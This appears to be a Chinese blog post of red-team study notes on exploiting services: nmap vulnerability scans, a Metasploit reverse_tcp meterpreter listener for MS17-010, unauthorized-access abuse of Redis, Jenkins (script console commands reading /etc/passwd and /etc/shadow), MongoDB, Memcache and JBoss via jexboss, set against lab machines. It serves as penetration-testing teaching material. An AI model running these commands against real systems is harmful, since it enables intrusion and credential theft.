渗透攻击之应用系统漏洞利用

最新推荐文章于 2024-09-27 17:41:32 发布
最新推荐文章于 2024-09-27 17:41:32 发布
阅读量26 收藏
点赞数
分类专栏: 渗透攻击(红队) 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51614330/article/details/140962304
版权

应用系统漏洞利用

常见漏洞扫描

nmap扫描技巧
auth处理身份验证
broadcast网络广播
brute暴力破解
default默认
discovery服务发现
dos拒绝服务
exploit漏洞利用
external外部扩展
fuzzer模糊测试
intrusive扫描可能造成不良后果
malware检测后门
safe扫描危害较小
version版本识别
vuln漏洞检测
通用参数 -vuln
nmap --script=vuln 192.168.117.130
MS17-010
nmap --script=smb-vuln-ms17-010 192.168.117.130

impacket框架之mssql服务器安全检测

mssqlclient与其他工具相比的优势
1.跨平台,Python脚本编写,并且已有exe版本。
2.命令行执行,速度快。
3.支持使用socks代理传输数据。
4.支持以hash传递的方式进行账号验证。
5.支持Windows认证模式进行mssql服务的安全检测。
6.执行SQL命令可以是交互式,也可以直接回显SQL命令执行结果。
mssqlclient的基本使用命令
验证以Windows认证模式的mssql服务
python mssqlclient.py domain/username:password@ip -windows-auth
验证以mssql账号密码认证的mssql服务
python mssqlclien.py ./username:password@ip
验证以mssql账号密码认证的mssql服务,并执行command.txt内的SQL命令
python mssqlclient.py ./username:password@ip -file command.txt

MS17_010 py脚本利用

利用
在本机虚拟机搭建kali和Windows7系统,由于Windows7为64位系统,所以kali中用metasploit生成64位的dll
在这里插入图片描述
msfconsole 进入控制台
在这里插入图片描述

use exploit/multi/handler 使用监听模式
在这里插入图片描述
set payload windows/x64/meterpreter/reverse_tcp 设置
payload
在这里插入图片描述
show options 查看配置信息
在这里插入图片描述
set LHOST 192.168.1.105 设置本地IP
在这里插入图片描述
set LPORT 12399 设置本地端口
在这里插入图片描述
run 运行
在这里插入图片描述

未授权漏洞

Redis

定义:redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库。
代码:redis-cli
在这里插入图片描述

写入文件
在这里插入图片描述

反弹shell-Linux
在这里插入图片描述
写入公钥
生成公钥:ssh-keygen -t rsa
在这里插入图片描述
清空数据库
172.16.143.1:6379> FLUSHALL

jenkins

定义:默认是8080端口,未授权访问就是任意用户都能访问,都可以执行命令;
127.0.0.1:8080/jenkins/manage
127.0.0.1:8080/jenkins/script
linux:
println “ifconfig -a”.execute().text
println “cat etc/passwd”.execute().text
println “cat etc/shadow”.execute().text

Mongodb

利用可视化工具连接 默认端口:28017
脚本检测:
在这里插入图片描述

Zookeeper

默认端口:2181 2171
ls / 查看所有节点
get / 获取某个节点信息
脚本检测:
在这里插入图片描述

Elasticsearch

默认端口:9200
在这里插入图片描述

Memcache

默认端口11211
提示连接成功表示漏洞存在。telnet11211,或nc -vv11211

JBOSS未授权访问

jboss
jbboss是基于J2EE开放源代码的应用服务。JBOSS代码遵循LGPL许可,可以在任何商业应用中。
jboss未授权访问
未授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令
漏洞复现(使用CVE-2017-7504的漏洞环境)
使用vulhub漏洞平台,启用环境位置:
vulhub–jboss–cve-2017-7504
docker-compose up -d
启用成功使用浏览器访问:IP:8080,无账号密码
进入后台找到入口
使用kali进行漏洞利用
git clone https://github.com/joaomatosf/jexboss cd jexboss
python3 jexboss.py -u ip+port
执行工具会依次检测项目,有漏洞就会显示红色的:VULNERALE(易攻击的),工具就会根据找到容易受到攻击的点,进行利用。
获取shell后执行shell命令:cat /etc/passwd

夜zero
关注
专栏目录
渗透攻击之ms14-064漏洞利用实验
wylululu的博客
01-07 8196
ms14-064简介 Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 –Win10+IE11全版本。 实验步骤: 第一步:打开已安装好的kaili虚拟机系统,显示界面: 第二步:单击打开metasploit framework或者点击左上角应用程序&...
渗透测试指操作系统漏洞发现与防御概述
永远是少年
12-25 1127
今天继续给大家介绍渗透测试相关知识,本文主要内容是渗透测试指操作系统漏洞发现与防御概述。 一、操作系统漏洞发现概述 二、操作系统漏洞发现利用方法 三、操作系统漏洞发现修复
【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程
08-06 2538
【kali-漏洞利用应用渗透攻击过程
SSRF漏洞的利用与攻击内网应用
qwzf
03-24 3054
0x02 SSRF漏洞 1、SSRF漏洞简介 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(由于它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内网) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目...
Kali——Metasploit的漏洞渗透(对操作系统应用程序、客户端攻击
董哥的黑板报
07-24 3744
一、查看Metasploit的漏洞渗透模块 从左到右依次为: 序号、模块的名称、披露日期、威胁等级、Check、模块的描述 模块的威胁等级分为: excellent(该模块在绝大多数环境下正常执行)、great、good、normal(模块可以执行,但是对目标有严格的要求)、average、lowRank(这类模块很难执行)、manual(该模块几乎不能执行) 模块名称的命名规则: 三...
Web应用渗透测试系统(Python)
毕业作品网站
11-04 5553
本项目命名为Sec-Tools,是一款基于的多功能 Web 应用渗透测试系统,包含漏洞检测、目录识别、端口扫描、指纹识别、域名探测、旁站探测、信息泄露检测等功能。
系统渗透ms14-064漏洞攻击
旺仔Sec&blog
12-15 1829
Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术, 远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本... metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execution 漏洞利用成功 ...
掌握安全渗透测试:利用永恒之黑漏洞获取Windows 10系统访问权限
weixin_43822401的博客
05-21 1516
靶机:IP地址为,运行Windows 10 1903版本。攻击机:IP地址为。文档提供了利用永恒之黑漏洞对Windows 10进行渗透的详细步骤,包括获取初始访问、创建远程桌面用户、开启后门以及维持权限访问。请注意,这些步骤仅供教育目的,实际操作应在授权的渗透测试和安全研究环境中进行。未经授权的渗透测试可能违反法律。
渗透测试基础之永恒之蓝漏洞复现
记录开发和安全学习过程中的点点滴滴
09-08 1858
渗透测试(Penetration Testing)是指专业的安全测试人员模拟黑客攻击的行为,对目标系统进行主动攻击测试的过程。通过模拟攻击渗透测试帮助企业评估其系统或网络的安全性,发现潜在的安全漏洞和弱点,从而提供相应的防护措施和改进建议。渗透测试的目的是帮助组织发现和修复系统中的安全漏洞,以提升安全性和防御能力。每日一言。
计算机病毒与防护:渗透测试之漏洞利用.ppt
06-10
【计算机病毒与防护:渗透测试之漏洞利用渗透测试是一种模拟黑客攻击行为,对系统安全性进行评估的方法。它旨在发现并修复系统中的漏洞,防止恶意攻击者利用这些漏洞造成损害。渗透测试通常包括一系列步骤,从...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
漏洞利用工具如压缩包中的"jbosscve-2017-12149",是安全研究人员或渗透测试者用来检测和测试系统是否受到该漏洞影响的工具。这些工具通常包含精心设计的恶意序列化数据,以及用于触发和验证漏洞利用的脚本。它们...
Web-安全渗透全套教程文件包含漏洞渗透攻击.zip
05-22
本套教程专注于“文件包含漏洞”这一特定的渗透攻击方式,它常被黑客利用来获取服务器敏感信息或者执行恶意代码。下面,我们将深入探讨相关知识点。 首先,我们要理解什么是“文件包含漏洞”。在许多动态网站中,...
2021-08-26 网安实验-Windows系统渗透测试之EternalBlue漏洞利用复现
热门推荐
时光隧道
08-26 5万+
Metasploit :是一款开源的安全漏洞检测工具。 fb工具目录:Shadow Brokers 公布的NSA方程式组织黑客工具包Windows部分工具,里面包含了IIS6.0、445端口、3389端口、Rootkit等远程利用工具。 主要工具简介: EternalBlue(永恒之蓝) : SMBv1 漏洞攻击工具,影响所有Windows平台,还在支持期的系统打上MS17-010 可以免疫,不再支持期的系统,可以禁用SMBv1(配置注册表或组策略,需要重启) EmeraldThread(翡翠纤维)
探索光耦:隔离电压——光耦保障电路安全与性能的关键
forvevr的博客
09-25 754
在实际应用中,光耦的隔离电压应根据工作环境中的电压等级、电流负载和潜在的电压波动来选择。比如,对于高压电力设备,建议选择隔离电压较高的光耦,以应对突发的电压尖峰或电流浪涌。在现代电子设备和系统中,电气隔离是保障电路稳定运行和安全的重要环节,而光耦(光电耦合器)则是实现这种隔离的核心元件之一。具有较高隔离电压的光耦能在这些波动和干扰中,稳定地工作,确保系统运行的连续性和可靠性。光耦通过将不同电位的电路有效隔离,避免了跨电路间的电流回流对低压电路元件的损害,延长了设备的使用寿命。
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 675
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
Splashtop 加入 Microsoft 智能安全协会
最新发布
SplashtopLoki的博客
09-27 565
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
浅谈软件安全开发的重要性及安全开发实践
esion23011的专栏
09-25 507
*制定安全开发可量化管理流程**:为了确保软件开发过程的安全性,企业应建立一套可量化、可追溯的安全开发管理流程。通过建立企业安全战略、制定安全开发管理流程、提高安全开发意识以及实施一系列安全开发实践措施,企业可以构建安全可靠的信息系统,为企业的持续发展和创新提供有力保障。**明确安全需求**:基于攻击面分析的结果,企业应明确软件系统安全需求。**建立企业安全战略**:企业应根据国家法律法规要求、自身业务特点及软件应用系统的实际情况,制定符合自身需求的安全发展战略。#### 企业要怎么进行安全开发?
WEB渗透技术:利用NC提交进行攻击
"这篇资料主要介绍了NC提交...SQL注入的危害极大,因此,对用户输入的严格验证和过滤、应用安全编程、定期进行安全审计和渗透测试是防范此类攻击的关键措施。了解和掌握这些知识对于保障Web应用系统安全性至关重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值